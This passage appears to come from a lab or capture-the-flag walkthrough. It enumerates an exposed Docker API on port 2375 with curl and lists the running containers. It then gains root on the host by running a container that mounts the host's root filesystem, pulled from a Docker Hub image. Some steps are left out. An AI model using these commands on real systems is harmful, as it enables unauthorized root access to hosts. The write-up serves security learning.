Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Now that we have found the port on which the Docker API is listening let's see if we can get some interesting information from there? We can either do a curl to the following endpoint, or simply put the following GET request in the browser to see the results.
curl http://<ip adress>:2375/images/json
we now find information about all the current running images:
Now, we first test that the alias works, we do this by simply running the following command:
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
8f4bca8ef241 wordpress:latest "docker-entrypoint.s…" 18 months ago Up 2 hours 0.0.0.0:8000->80/tcp content_wordpress_1
13f0a3bb2706 mysql:5.7 "docker-entrypoint.s…" 18 months ago Up 2 hours 3306/tcp content_db_1
b90babce1037 jeroenpeeters/docker-ssh "npm start" 18 months ago Up 2 hours 22/tcp, 8022/tcp content_ssh_1
Now, we want to become root on the Docker host machine, we can achieve this by running a special container.
The command below is going to perform the privilege escalation and fetches a Docker image from the Docker Hub Registry and runs it. The -v parameter that you pass to Docker specifies that you want to create a volume in the Docker instance. The -i and -t parameters put Docker into ‘shell mode’ rather than starting a daemon process.
The instance is set up to mount the root filesystem of the host machine to the instance’s volume, so when the instance starts it immediately loads a chroot into that volume. This effectively gives you root on the machine.
There are many, many other ways to achieve this, but this was one of the most straightforward.
dockerx run -v /:/hostOS -i -t chrisfosterelli/rootplease
Unable to find image 'chrisfosterelli/rootplease:latest' locally